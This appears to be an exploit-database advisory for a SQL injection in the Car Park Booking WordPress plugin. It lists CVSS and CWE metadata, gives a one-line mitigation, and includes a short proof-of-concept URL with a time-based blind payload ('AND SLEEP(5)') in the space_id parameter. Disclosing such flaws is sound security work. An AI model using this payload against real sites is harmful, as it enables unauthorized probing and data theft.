vendor:
Car Park Booking WordPress Plugin
by:
8bitsec
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Car Park Booking WordPress Plugin
Affected Version From: 13 October 17
Affected Version To: 13 October 17
Patch Exists: YES
Related CWE: N/A
CPE: a:codecanyon:car_park_booking_wordpress_plugin
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6
2017
WordPress Plugin Car Park Booking – SQL Injection
SQL injection on [space_id] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/booking-page/?step=3&space_id=9 AND SLEEP(5)&re_price=12 Parameter: space_id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: step=3&space_id=9 AND SLEEP(5)&re_price=12
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.